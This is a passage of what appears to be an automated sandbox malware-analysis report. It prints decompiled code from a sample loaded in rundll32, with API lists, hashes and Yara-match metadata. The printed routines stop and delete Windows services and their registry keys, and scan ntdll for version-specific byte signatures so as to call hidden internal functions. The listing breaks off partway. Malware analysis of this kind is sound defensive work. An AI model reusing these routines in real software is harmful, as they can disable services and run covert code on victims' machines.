                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 45%
                                                            			E04633C30(void* __ebx, void* __edi, void* __esi, char* _a4) {
                                                            				signed int _v8;
                                                            				intOrPtr _v14;
                                                            				intOrPtr _v18;
                                                            				intOrPtr _v22;
                                                            				intOrPtr _v26;
                                                            				intOrPtr _v30;
                                                            				intOrPtr _v34;
                                                            				intOrPtr _v38;
                                                            				intOrPtr _v42;
                                                            				char _v44;
                                                            				intOrPtr _v48;
                                                            				unsigned int _v52;
                                                            				intOrPtr _v56;
                                                            				intOrPtr _v60;
                                                            				intOrPtr _v64;
                                                            				intOrPtr _v68;
                                                            				long _v72;
                                                            				signed int _t84;
                                                            				long _t103;
                                                            				unsigned int _t107;
                                                            				intOrPtr _t117;
                                                            				signed int _t119;
                                                            				intOrPtr _t135;
                                                            				signed int _t137;
                                                            				void* _t146;
                                                            				intOrPtr _t152;
                                                            				long _t154;
                                                            				signed int _t155;
                                                            				signed int _t156;
                                                            				intOrPtr _t157;
                                                            				char* _t159;
                                                            				signed int _t160;
                                                            
                                                            				_t84 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t84 ^ _t160;
                                                            				_t159 = _a4;
                                                            				_v72 = GetTickCount();
                                                            				_t154 = GetTickCount();
                                                            				_v56 =  *((intOrPtr*)(_t159 + 0x10));
                                                            				_v60 =  *((intOrPtr*)(_t159 + 0x14));
                                                            				_v64 =  *((intOrPtr*)(_t159 + 0x18));
                                                            				_v68 =  *((intOrPtr*)(_t159 + 0x1c));
                                                            				_v44 = 0x267;
                                                            				while( *((char*)(_t159 + 1)) != 0) {
                                                            					_t103 = GetTickCount();
                                                            					_t142 = _t103 - _t154;
                                                            					_t107 = 0x10624dd3 * (_t103 - _t154) >> 0x20 >> 6;
                                                            					_v52 = _t107;
                                                            					if(_t107 >= 5) {
                                                            						_t154 = GetTickCount();
                                                            						_v48 = _t154;
                                                            						if( *((intOrPtr*)( *((intOrPtr*)(_t159 + 4)) + 8)) != 0) {
                                                            							_t152 =  *((intOrPtr*)(_t159 + 0x14));
                                                            							_t157 =  *((intOrPtr*)(_t159 + 0x18));
                                                            							_t135 =  *((intOrPtr*)(_t159 + 0x1c));
                                                            							_v42 =  *((intOrPtr*)(_t159 + 0x10));
                                                            							_v38 = _t152;
                                                            							asm("sbb edx, [ebp-0x38]");
                                                            							_v34 = _t157;
                                                            							_v30 = _t135;
                                                            							_v26 = E04671B40( *((intOrPtr*)(_t159 + 0x10)) - _v56, _t152, _v52, 0);
                                                            							_t146 = _t157 - _v64;
                                                            							_v22 = _t152;
                                                            							asm("sbb eax, [ebp-0x40]");
                                                            							_v18 = E04671B40(_t146, _t135, _v52, 0);
                                                            							_push(_t146);
                                                            							_t142 =  *(_t159 + 8);
                                                            							_v56 =  *((intOrPtr*)(_t159 + 0x10));
                                                            							_push(0x3f);
                                                            							_v60 =  *((intOrPtr*)(_t159 + 0x14));
                                                            							_push(0x22);
                                                            							_push( &_v44);
                                                            							_v14 = _t152;
                                                            							_v64 = _t157;
                                                            							_v68 = _t135;
                                                            							E04631C60( *(_t159 + 8));
                                                            							_t154 = _v48;
                                                            						}
                                                            						_t117 =  *((intOrPtr*)(_t159 + 4));
                                                            						if( *((short*)(_t117 + 0x16)) == 2) {
                                                            							_t156 = 0;
                                                            							if( *((intOrPtr*)(_t117 + 0x1c)) > 0) {
                                                            								do {
                                                            									_t119 = E0465EF46(_t142) & 0x800000ff;
                                                            									if(_t119 < 0) {
                                                            										_t119 = (_t119 - 0x00000001 | 0xffffff00) + 1;
                                                            									}
                                                            									_t142 =  *( *((intOrPtr*)(_t159 + 4)) + 0x3c);
                                                            									 *(_t156 +  *( *((intOrPtr*)(_t159 + 4)) + 0x3c)) = _t119;
                                                            									_t156 = _t156 + 1;
                                                            								} while (_t156 <  *((intOrPtr*)( *((intOrPtr*)(_t159 + 4)) + 0x1c)));
                                                            							}
                                                            							_t154 = _v48;
                                                            						}
                                                            					}
                                                            					Sleep(0x64);
                                                            					_t137 = GetTickCount() - _v72;
                                                            					if(0x88888889 * (0x10624dd3 * _t137 >> 0x20 >> 6) >> 0x20 >> 5 >= ( *( *((intOrPtr*)(_t159 + 4)) + 0x14) & 0x0000ffff)) {
                                                            						 *((char*)(_t159 + 1)) = 0;
                                                            					}
                                                            				}
                                                            				if( *((intOrPtr*)(_t159 + 0x38)) != 0) {
                                                            					_t137 = 0;
                                                            					_t155 = 0;
                                                            					if(0 <  *( *((intOrPtr*)(_t159 + 4)) + 0x12)) {
                                                            						do {
                                                            							WaitForSingleObject( *( *((intOrPtr*)(_t159 + 0x38)) + _t155 * 4), 0xffffffff);
                                                            							CloseHandle( *( *((intOrPtr*)(_t159 + 0x38)) + _t155 * 4));
                                                            							_t155 = _t155 + 1;
                                                            						} while (_t155 < ( *( *((intOrPtr*)(_t159 + 4)) + 0x12) & 0x0000ffff));
                                                            					}
                                                            					 *_t159 = 1;
                                                            				}
                                                            				_push(_t137);
                                                            				_push(0x3f);
                                                            				_push(2);
                                                            				_v44 = 0x67;
                                                            				E04631C60( *(_t159 + 8));
                                                            				return E04655AFE(_v8 ^ _t160,  &_v44);
                                                            			}



































                                                            0x04633c36
                                                            0x04633c3d
                                                            0x04633c48
                                                            0x04633c4e
                                                            0x04633c57
                                                            0x04633c5c
                                                            0x04633c62
                                                            0x04633c68
                                                            0x04633c6e
                                                            0x04633c71
                                                            0x04633c77
                                                            0x04633c80
                                                            0x04633c89
                                                            0x04633c8f
                                                            0x04633c92
                                                            0x04633c98
                                                            0x04633ca0
                                                            0x04633ca5
                                                            0x04633cac
                                                            0x04633cb1
                                                            0x04633cb4
                                                            0x04633cb7
                                                            0x04633cbf
                                                            0x04633cc5
                                                            0x04633cc8
                                                            0x04633ccd
                                                            0x04633cd0
                                                            0x04633cdd
                                                            0x04633ce2
                                                            0x04633ce7
                                                            0x04633cea
                                                            0x04633cf4
                                                            0x04633cfa
                                                            0x04633cfb
                                                            0x04633cfe
                                                            0x04633d04
                                                            0x04633d06
                                                            0x04633d0c
                                                            0x04633d0e
                                                            0x04633d0f
                                                            0x04633d12
                                                            0x04633d15
                                                            0x04633d18
                                                            0x04633d23
                                                            0x04633d23
                                                            0x04633d26
                                                            0x04633d2e
                                                            0x04633d30
                                                            0x04633d35
                                                            0x04633d37
                                                            0x04633d3c
                                                            0x04633d41
                                                            0x04633d49
                                                            0x04633d49
                                                            0x04633d4d
                                                            0x04633d50
                                                            0x04633d53
                                                            0x04633d57
                                                            0x04633d37
                                                            0x04633d5c
                                                            0x04633d5c
                                                            0x04633d2e
                                                            0x04633d61
                                                            0x04633d70
                                                            0x04633d8b
                                                            0x04633d8d
                                                            0x04633d8d
                                                            0x04633d91
                                                            0x04633d9f
                                                            0x04633da4
                                                            0x04633da6
                                                            0x04633dac
                                                            0x04633db4
                                                            0x04633dbc
                                                            0x04633dc4
                                                            0x04633dcd
                                                            0x04633dd2
                                                            0x04633db4
                                                            0x04633dd6
                                                            0x04633dd6
                                                            0x04633dd9
                                                            0x04633de0
                                                            0x04633de2
                                                            0x04633de5
                                                            0x04633deb
                                                            0x04633e02

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CountTick$__aulldiv$CloseHandleObjectSingleSleepWait
                                                            • String ID: g
                                                            • API String ID: 227884459-30677878
                                                            • Opcode ID: 7fc03dfa3f2822d25f213b251d6e79793d3e9491f493205cc09991233bf82b84
                                                            • Instruction ID: a318edc56b9efc55002c96959eae0022e5980e9e131e4a4b9373bd44b15a088f
                                                            • Opcode Fuzzy Hash: 7fc03dfa3f2822d25f213b251d6e79793d3e9491f493205cc09991233bf82b84
                                                            • Instruction Fuzzy Hash: 45512871A006089FDB24DFA9D984AAEBBF5FF48710F40851AE44AE7761E730F844CB24
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 95%
                                                            			E04643A60(void* __ebx, short* __ecx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				short _v2056;
                                                            				intOrPtr _v2080;
                                                            				struct _SERVICE_STATUS _v2084;
                                                            				short* _v2088;
                                                            				void* _v2092;
                                                            				signed int _t13;
                                                            				void* _t15;
                                                            				void* _t38;
                                                            				short* _t41;
                                                            				void* _t42;
                                                            				signed int _t43;
                                                            
                                                            				_t13 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t13 ^ _t43;
                                                            				_t41 = __ecx;
                                                            				_v2088 = __ecx;
                                                            				_t15 = OpenSCManagerW(0, 0, 0xf003f);
                                                            				_v2092 = _t15;
                                                            				if(_t15 == 0) {
                                                            					L12:
                                                            					return E04655AFE(_v8 ^ _t43);
                                                            				}
                                                            				_t38 = OpenServiceW(_t15, _t41, 0xf01ff);
                                                            				if(_t38 == 0) {
                                                            					L11:
                                                            					CloseServiceHandle(_v2092);
                                                            					goto L12;
                                                            				}
                                                            				_t42 = 0;
                                                            				do {
                                                            					if(QueryServiceStatus(_t38,  &_v2084) == 0) {
                                                            						goto L6;
                                                            					}
                                                            					if(_v2080 == 1) {
                                                            						if(DeleteService(_t38) != 0) {
                                                            							E0465DEA0(_t38,  &_v2056, 0, 0x800);
                                                            							wsprintfW( &_v2056, L"SYSTEM\\CurrentControlSet\\Services\\%s", _v2088);
                                                            							SHDeleteKeyW(0x80000002,  &_v2056);
                                                            						}
                                                            						L10:
                                                            						CloseServiceHandle(_t38);
                                                            						goto L11;
                                                            					}
                                                            					ControlService(_t38, 1,  &_v2084);
                                                            					Sleep(0x1f4);
                                                            					L6:
                                                            					_t42 = _t42 + 0x1f4;
                                                            				} while (_t42 < 0x1388);
                                                            				goto L10;
                                                            			}















                                                            0x04643a69
                                                            0x04643a70
                                                            0x04643a7c
                                                            0x04643a80
                                                            0x04643a86
                                                            0x04643a8c
                                                            0x04643a94
                                                            0x04643b5e
                                                            0x04643b6f
                                                            0x04643b6f
                                                            0x04643aa8
                                                            0x04643aac
                                                            0x04643b51
                                                            0x04643b57
                                                            0x00000000
                                                            0x04643b5d
                                                            0x04643ab2
                                                            0x04643ab4
                                                            0x04643ac4
                                                            0x00000000
                                                            0x00000000
                                                            0x04643acd
                                                            0x04643b03
                                                            0x04643b13
                                                            0x04643b2a
                                                            0x04643b3f
                                                            0x04643b45
                                                            0x04643b4a
                                                            0x04643b4b
                                                            0x00000000
                                                            0x04643b4b
                                                            0x04643ad9
                                                            0x04643ae4
                                                            0x04643aea
                                                            0x04643aea
                                                            0x04643af0
                                                            0x00000000

                                                            APIs
                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 04643A86
                                                            • OpenServiceW.ADVAPI32(00000000,?,000F01FF), ref: 04643AA2
                                                            • QueryServiceStatus.ADVAPI32(00000000,?,?,000F01FF), ref: 04643ABC
                                                            • ControlService.ADVAPI32(00000000,00000001,?,?,000F01FF), ref: 04643AD9
                                                            • Sleep.KERNEL32(000001F4,?,000F01FF), ref: 04643AE4
                                                            • DeleteService.ADVAPI32(00000000,?,000F01FF), ref: 04643AFB
                                                            • wsprintfW.USER32 ref: 04643B2A
                                                            • SHDeleteKeyW.SHLWAPI(80000002,?), ref: 04643B3F
                                                            • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF), ref: 04643B4B
                                                            • CloseServiceHandle.ADVAPI32(?,?,000F01FF), ref: 04643B57
                                                            Strings
                                                            • SYSTEM\CurrentControlSet\Services\%s, xrefs: 04643B24
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$CloseDeleteHandleOpen$ControlManagerQuerySleepStatuswsprintf
                                                            • String ID: SYSTEM\CurrentControlSet\Services\%s
                                                            • API String ID: 3594024867-2757632955
                                                            • Opcode ID: aea0e065b9dbea50fe89095ca7aabda3d8458eb2c8bedea9ccd8c16def2e9bf3
                                                            • Instruction ID: 60a907ef127f28147c5c2b74a12a7c26217fbb610d5a16456e75994155dffcae
                                                            • Opcode Fuzzy Hash: aea0e065b9dbea50fe89095ca7aabda3d8458eb2c8bedea9ccd8c16def2e9bf3
                                                            • Instruction Fuzzy Hash: C521C471A40218ABDB205B64DC4CFBAB7BCFB54711F0050A9BA09E2241FE759D858FE0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 49%
                                                            			E0463C9B0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                            				signed int _v8;
                                                            				short _v12;
                                                            				char _v16;
                                                            				char _v18;
                                                            				short _v20;
                                                            				intOrPtr _v24;
                                                            				char _v28;
                                                            				signed int _v32;
                                                            				short _v36;
                                                            				char _v40;
                                                            				intOrPtr _v304;
                                                            				signed int _v308;
                                                            				intOrPtr _v312;
                                                            				char _v316;
                                                            				intOrPtr _v320;
                                                            				signed int _v324;
                                                            				signed int _t97;
                                                            				intOrPtr _t99;
                                                            				_Unknown_base(*)()* _t104;
                                                            				void* _t109;
                                                            				intOrPtr _t110;
                                                            				signed int _t111;
                                                            				void* _t112;
                                                            				void* _t117;
                                                            				void* _t123;
                                                            				void* _t128;
                                                            				void* _t131;
                                                            				void* _t135;
                                                            				void* _t138;
                                                            				void* _t141;
                                                            				signed int _t146;
                                                            				intOrPtr _t150;
                                                            				signed int _t156;
                                                            				signed int _t157;
                                                            				void* _t158;
                                                            				void* _t163;
                                                            				void* _t169;
                                                            				void* _t173;
                                                            				void* _t174;
                                                            				signed int _t177;
                                                            				void* _t178;
                                                            				void* _t179;
                                                            				intOrPtr* _t183;
                                                            				signed int _t184;
                                                            				signed int _t186;
                                                            				void* _t187;
                                                            				void* _t189;
                                                            				void* _t191;
                                                            				void* _t194;
                                                            				signed int _t197;
                                                            				void* _t198;
                                                            				char* _t200;
                                                            				void* _t202;
                                                            				struct HINSTANCE__* _t204;
                                                            				void* _t206;
                                                            				signed int _t207;
                                                            				signed int _t208;
                                                            				void* _t210;
                                                            				signed int _t212;
                                                            				void* _t215;
                                                            				void* _t217;
                                                            				void* _t218;
                                                            				void* _t220;
                                                            				signed int _t224;
                                                            
                                                            				_t187 = __edi;
                                                            				_t141 = __ebx;
                                                            				_t97 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t97 ^ _t224;
                                                            				_t99 =  *((intOrPtr*)(__ecx + 0xc));
                                                            				if( *((intOrPtr*)(_t99 + 0xc0)) <= 0 ||  *((intOrPtr*)(_t99 + 0xc4)) <= 0) {
                                                            					L94:
                                                            					__eflags = _v8 ^ _t224;
                                                            					return E04655AFE(_v8 ^ _t224);
                                                            				} else {
                                                            					_t204 = GetModuleHandleA("ntdll");
                                                            					if(_t204 == 0) {
                                                            						L93:
                                                            						goto L94;
                                                            					} else {
                                                            						E0465DEA0(__edi,  &_v316, 0, 0x114);
                                                            						_t104 = GetProcAddress(_t204, "RtlGetVersion");
                                                            						if(_t104 == 0) {
                                                            							goto L93;
                                                            						} else {
                                                            							_push( &_v316);
                                                            							if( *_t104() != 0 || _t204->i != 0x5a4d) {
                                                            								goto L93;
                                                            							} else {
                                                            								_t183 =  *((intOrPtr*)(_t204 + 0x3c)) + _t204;
                                                            								if( *_t183 != 0x4550) {
                                                            									goto L93;
                                                            								} else {
                                                            									_t156 = 0;
                                                            									_t109 = ( *(_t183 + 0x14) & 0x0000ffff) + 0x18 + _t183;
                                                            									_t184 =  *(_t183 + 6) & 0x0000ffff;
                                                            									if(_t184 == 0) {
                                                            										goto L93;
                                                            									} else {
                                                            										while(( *(_t109 + 0x24) & 0x20000000) == 0) {
                                                            											_t156 = _t156 + 1;
                                                            											_t109 = _t109 + 0x28;
                                                            											if(_t156 < _t184) {
                                                            												continue;
                                                            											} else {
                                                            												return E04655AFE(_v8 ^ _t224);
                                                            											}
                                                            											goto L95;
                                                            										}
                                                            										_t157 =  *(_t109 + 0x10);
                                                            										_v324 = _t157;
                                                            										_t186 =  *((intOrPtr*)(_t109 + 0xc)) + _t204;
                                                            										__eflags = _t186;
                                                            										if(_t186 == 0) {
                                                            											goto L93;
                                                            										} else {
                                                            											__eflags = _t157;
                                                            											if(_t157 == 0) {
                                                            												goto L93;
                                                            											} else {
                                                            												_t110 = _v312;
                                                            												_push(_t141);
                                                            												_push(_t187);
                                                            												__eflags = _t110 - 0xa;
                                                            												if(_t110 != 0xa) {
                                                            													__eflags = _t110 - 6;
                                                            													if(_t110 != 6) {
                                                            														goto L92;
                                                            													} else {
                                                            														_t111 = _v308;
                                                            														__eflags = _t111 - 3;
                                                            														if(_t111 == 3) {
                                                            															goto L49;
                                                            														} else {
                                                            															__eflags = _t111 - 2;
                                                            															if(_t111 != 2) {
                                                            																__eflags = _t111 - 1;
                                                            																if(_t111 != 1) {
                                                            																	goto L92;
                                                            																} else {
                                                            																	_v24 = 0x458d2074;
                                                            																	_t191 = _t157 - 8;
                                                            																	_v20 = 0x96a50d4;
                                                            																	_t210 = 0;
                                                            																	__eflags = 0;
                                                            																	do {
                                                            																		_t163 = 0;
                                                            																		__eflags = 0;
                                                            																		while(1) {
                                                            																			_t117 = _t163 + _t210;
                                                            																			__eflags =  *((intOrPtr*)(_t117 + _t186)) -  *((intOrPtr*)(_t224 + _t163 - 0x14));
                                                            																			if( *((intOrPtr*)(_t117 + _t186)) !=  *((intOrPtr*)(_t224 + _t163 - 0x14))) {
                                                            																				break;
                                                            																			}
                                                            																			_t163 = _t163 + 1;
                                                            																			__eflags = _t163 - 8;
                                                            																			if(_t163 < 8) {
                                                            																				continue;
                                                            																			}
                                                            																			break;
                                                            																		}
                                                            																		__eflags = _t163 - 8;
                                                            																		if(_t163 == 8) {
                                                            																			_t212 = _t210 + 0xffffffec + _t186;
                                                            																			__eflags = _t212;
                                                            																			if(_t212 == 0) {
                                                            																				goto L92;
                                                            																			} else {
                                                            																				 *((intOrPtr*)(VirtualAlloc(0, 0x50, 0x3000, 4) + 0x18)) = _a4;
                                                            																				 *_t212();
                                                            																				__eflags = _v8 ^ _t224;
                                                            																				return E04655AFE(_v8 ^ _t224, _t119);
                                                            																			}
                                                            																		} else {
                                                            																			goto L84;
                                                            																		}
                                                            																		goto L95;
                                                            																		L84:
                                                            																		_t210 = _t210 + 1;
                                                            																		__eflags = _t210 - _t191;
                                                            																	} while (_t210 <= _t191);
                                                            																	__eflags = _v8 ^ _t224;
                                                            																	return E04655AFE(_v8 ^ _t224);
                                                            																}
                                                            															} else {
                                                            																_t146 = 0;
                                                            																_v16 = 0x8908458b;
                                                            																_v12 = 0xa045;
                                                            																_t194 = _t157 - 6;
                                                            																_v32 = 0x23fb4868;
                                                            																_t215 = 0;
                                                            																__eflags = 0;
                                                            																_v28 = 0x6a;
                                                            																do {
                                                            																	_t169 = 0;
                                                            																	__eflags = 0;
                                                            																	while(1) {
                                                            																		_t123 = _t169 + _t215;
                                                            																		__eflags =  *((intOrPtr*)(_t123 + _t186)) -  *((intOrPtr*)(_t224 + _t169 - 0xc));
                                                            																		if( *((intOrPtr*)(_t123 + _t186)) !=  *((intOrPtr*)(_t224 + _t169 - 0xc))) {
                                                            																			break;
                                                            																		}
                                                            																		_t169 = _t169 + 1;
                                                            																		__eflags = _t169 - 6;
                                                            																		if(_t169 < 6) {
                                                            																			continue;
                                                            																		}
                                                            																		break;
                                                            																	}
                                                            																	__eflags = _t169 - 6;
                                                            																	if(_t169 == 6) {
                                                            																		_t146 = _t186 - 0xc + _t215;
                                                            																		__eflags = _t146;
                                                            																	} else {
                                                            																		goto L64;
                                                            																	}
                                                            																	L67:
                                                            																	__eflags = _t146;
                                                            																	if(_t146 != 0) {
                                                            																		L77:
                                                            																		 *((intOrPtr*)(VirtualAlloc(0, 0x50, 0x3000, 4) + 0x18)) = _a4;
                                                            																		 *_t146();
                                                            																		__eflags = _v8 ^ _t224;
                                                            																		return E04655AFE(_v8 ^ _t224, _t125);
                                                            																	} else {
                                                            																		_t217 = 0;
                                                            																		_t197 = _v324 + 0xfffffffb;
                                                            																		__eflags = _t197;
                                                            																		do {
                                                            																			_t173 = 0;
                                                            																			asm("o16 nop [eax+eax]");
                                                            																			while(1) {
                                                            																				_t128 = _t173 + _t217;
                                                            																				__eflags =  *((intOrPtr*)(_t128 + _t186)) -  *((intOrPtr*)(_t224 + _t173 - 0x1c));
                                                            																				if( *((intOrPtr*)(_t128 + _t186)) !=  *((intOrPtr*)(_t224 + _t173 - 0x1c))) {
                                                            																					break;
                                                            																				}
                                                            																				_t173 = _t173 + 1;
                                                            																				__eflags = _t173 - 5;
                                                            																				if(_t173 < 5) {
                                                            																					continue;
                                                            																				}
                                                            																				break;
                                                            																			}
                                                            																			__eflags = _t173 - 5;
                                                            																			if(_t173 == 5) {
                                                            																				_t146 = _t186 - 7 + _t217;
                                                            																				__eflags = _t146;
                                                            																			} else {
                                                            																				goto L73;
                                                            																			}
                                                            																			L76:
                                                            																			__eflags = _t146;
                                                            																			if(_t146 == 0) {
                                                            																				goto L92;
                                                            																			} else {
                                                            																				goto L77;
                                                            																			}
                                                            																			goto L95;
                                                            																			L73:
                                                            																			_t217 = _t217 + 1;
                                                            																			__eflags = _t217 - _t197;
                                                            																		} while (_t217 <= _t197);
                                                            																		goto L76;
                                                            																	}
                                                            																	goto L95;
                                                            																	L64:
                                                            																	_t215 = _t215 + 1;
                                                            																	__eflags = _t215 - _t194;
                                                            																} while (_t215 <= _t194);
                                                            																goto L67;
                                                            															}
                                                            														}
                                                            													}
                                                            												} else {
                                                            													__eflags = _v308;
                                                            													if(_v308 != 0) {
                                                            														L92:
                                                            														goto L93;
                                                            													} else {
                                                            														_t150 = _v304;
                                                            														__eflags = _t150 - 0x3fab;
                                                            														if(_t150 <= 0x3fab) {
                                                            															__eflags = _t150 - 0x3ad7 - 0x4d4;
                                                            															if(_t150 - 0x3ad7 > 0x4d4) {
                                                            																__eflags = _t150 - 0x3ad7;
                                                            																if(_t150 >= 0x3ad7) {
                                                            																	goto L92;
                                                            																} else {
                                                            																	L49:
                                                            																	_v24 = 0x6a096a50;
                                                            																	_t189 = _t157 - 7;
                                                            																	_v20 = 0x8b01;
                                                            																	_t206 = 0;
                                                            																	__eflags = 0;
                                                            																	_v18 = 0xc1;
                                                            																	do {
                                                            																		_t158 = 0;
                                                            																		__eflags = 0;
                                                            																		while(1) {
                                                            																			_t112 = _t158 + _t206;
                                                            																			__eflags =  *((intOrPtr*)(_t112 + _t186)) -  *((intOrPtr*)(_t224 + _t158 - 0x14));
                                                            																			if( *((intOrPtr*)(_t112 + _t186)) !=  *((intOrPtr*)(_t224 + _t158 - 0x14))) {
                                                            																				break;
                                                            																			}
                                                            																			_t158 = _t158 + 1;
                                                            																			__eflags = _t158 - 7;
                                                            																			if(_t158 < 7) {
                                                            																				continue;
                                                            																			}
                                                            																			break;
                                                            																		}
                                                            																		__eflags = _t158 - 7;
                                                            																		if(_t158 == 7) {
                                                            																			_t207 = _t206 + 0xffffffe5;
                                                            																			__eflags = _t207;
                                                            																			goto L89;
                                                            																		} else {
                                                            																			goto L54;
                                                            																		}
                                                            																		goto L95;
                                                            																		L54:
                                                            																		_t206 = _t206 + 1;
                                                            																		__eflags = _t206 - _t189;
                                                            																	} while (_t206 <= _t189);
                                                            																	__eflags = _v8 ^ _t224;
                                                            																	return E04655AFE(_v8 ^ _t224);
                                                            																}
                                                            															} else {
                                                            																_v16 = 0x4d8dc18b;
                                                            																_t198 = _t157 - 6;
                                                            																_v12 = 0x51bc;
                                                            																_t218 = 0;
                                                            																__eflags = 0;
                                                            																do {
                                                            																	_t174 = 0;
                                                            																	__eflags = 0;
                                                            																	while(1) {
                                                            																		_t131 = _t174 + _t218;
                                                            																		__eflags =  *((intOrPtr*)(_t131 + _t186)) -  *((intOrPtr*)(_t224 + _t174 - 0xc));
                                                            																		if( *((intOrPtr*)(_t131 + _t186)) !=  *((intOrPtr*)(_t224 + _t174 - 0xc))) {
                                                            																			break;
                                                            																		}
                                                            																		_t174 = _t174 + 1;
                                                            																		__eflags = _t174 - 6;
                                                            																		if(_t174 < 6) {
                                                            																			continue;
                                                            																		}
                                                            																		break;
                                                            																	}
                                                            																	__eflags = _t174 - 6;
                                                            																	if(_t174 == 6) {
                                                            																		_t207 = _t218 + 0xffffffe8;
                                                            																		L89:
                                                            																		_t208 = _t207 + _t186;
                                                            																		__eflags = _t208;
                                                            																		goto L90;
                                                            																	} else {
                                                            																		goto L45;
                                                            																	}
                                                            																	goto L95;
                                                            																	L45:
                                                            																	_t218 = _t218 + 1;
                                                            																	__eflags = _t218 - _t198;
                                                            																} while (_t218 <= _t198);
                                                            																__eflags = _v8 ^ _t224;
                                                            																return E04655AFE(_v8 ^ _t224);
                                                            															}
                                                            														} else {
                                                            															_v16 = 0x4d8dc18b;
                                                            															_t200 =  &_v40;
                                                            															_v12 = 0x51ac;
                                                            															_v40 = 0xc085f633;
                                                            															_v36 = 0x379;
                                                            															_v24 = 0x85b04589;
                                                            															_v20 = 0x75c0;
                                                            															_v18 = 0x12;
                                                            															_v320 = 0x2c;
                                                            															__eflags = _t150 - 0x42ee;
                                                            															if(_t150 != 0x42ee) {
                                                            																__eflags = _t150 - 0x47ba;
                                                            																if(_t150 == 0x47ba) {
                                                            																	L20:
                                                            																	_v320 = 0x2e;
                                                            																} else {
                                                            																	__eflags = _t150 - 0x47bb;
                                                            																	if(_t150 == 0x47bb) {
                                                            																		goto L20;
                                                            																	}
                                                            																}
                                                            															} else {
                                                            																_t200 =  &_v16;
                                                            																_v320 = 0x18;
                                                            															}
                                                            															_t220 = 0;
                                                            															_t177 = _t157 + 0xfffffffa;
                                                            															__eflags = _t177;
                                                            															_v32 = _t177;
                                                            															do {
                                                            																_t178 = 0;
                                                            																asm("o16 nop [eax+eax]");
                                                            																while(1) {
                                                            																	_t135 = _t178 + _t220;
                                                            																	__eflags =  *((intOrPtr*)(_t135 + _t186)) -  *((intOrPtr*)(_t178 + _t200));
                                                            																	if( *((intOrPtr*)(_t135 + _t186)) !=  *((intOrPtr*)(_t178 + _t200))) {
                                                            																		break;
                                                            																	}
                                                            																	_t178 = _t178 + 1;
                                                            																	__eflags = _t178 - 6;
                                                            																	if(_t178 < 6) {
                                                            																		continue;
                                                            																	}
                                                            																	break;
                                                            																}
                                                            																__eflags = _t178 - 6;
                                                            																if(_t178 == 6) {
                                                            																	_t208 = _t220 - _v320 + _t186;
                                                            																	__eflags = _t208;
                                                            																} else {
                                                            																	goto L26;
                                                            																}
                                                            																L29:
                                                            																__eflags = _t208;
                                                            																if(_t208 != 0) {
                                                            																	L91:
                                                            																	 *((intOrPtr*)(VirtualAlloc(0, 0x50, 0x3000, 4) + 0x18)) = _a4;
                                                            																	 *_t208();
                                                            																} else {
                                                            																	__eflags = _t150 - 0x4a61;
                                                            																	if(_t150 == 0x4a61) {
                                                            																		_v32 = 0;
                                                            																		_t202 = _v324 + 0xfffffff9;
                                                            																		asm("o16 nop [eax+eax]");
                                                            																		do {
                                                            																			_t179 = 0;
                                                            																			__eflags = 0;
                                                            																			while(1) {
                                                            																				_t138 = _t179 + _t208;
                                                            																				__eflags =  *((intOrPtr*)(_t138 + _t186)) -  *((intOrPtr*)(_t224 + _t179 - 0x14));
                                                            																				if( *((intOrPtr*)(_t138 + _t186)) !=  *((intOrPtr*)(_t224 + _t179 - 0x14))) {
                                                            																					break;
                                                            																				}
                                                            																				_t179 = _t179 + 1;
                                                            																				__eflags = _t179 - 7;
                                                            																				if(_t179 < 7) {
                                                            																					continue;
                                                            																				}
                                                            																				break;
                                                            																			}
                                                            																			__eflags = _t179 - 7;
                                                            																			if(_t179 == 7) {
                                                            																				_t208 = _t208 + 0xffffffd8 + _t186;
                                                            																				__eflags = _t208;
                                                            																			} else {
                                                            																				goto L36;
                                                            																			}
                                                            																			L90:
                                                            																			if(__eflags != 0) {
                                                            																				goto L91;
                                                            																			}
                                                            																			goto L92;
                                                            																			L36:
                                                            																			_t208 = _t208 + 1;
                                                            																			__eflags = _t208 - _t202;
                                                            																		} while (_t208 <= _t202);
                                                            																		_t208 = _v32;
                                                            																		__eflags = _t208;
                                                            																		goto L90;
                                                            																	}
                                                            																}
                                                            																goto L92;
                                                            																L26:
                                                            																_t220 = _t220 + 1;
                                                            																__eflags = _t220 - _v32;
                                                            															} while (_t220 <= _v32);
                                                            															_t208 = 0;
                                                            															goto L29;
                                                            														}
                                                            													}
                                                            												}
                                                            											}
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            				L95:
                                                            			}



































































                                                            0x0463c9b0
                                                            0x0463c9b0
                                                            0x0463c9b9
                                                            0x0463c9c0
                                                            0x0463c9c3
                                                            0x0463c9cd
                                                            0x0463cdfe
                                                            0x0463ce01
                                                            0x0463ce0b
                                                            0x0463c9e0
                                                            0x0463c9ec
                                                            0x0463c9f0
                                                            0x0463cdfd
                                                            0x00000000
                                                            0x0463c9f6
                                                            0x0463ca04
                                                            0x0463ca12
                                                            0x0463ca1a
                                                            0x00000000
                                                            0x0463ca20
                                                            0x0463ca26
                                                            0x0463ca2b
                                                            0x00000000
                                                            0x0463ca3f
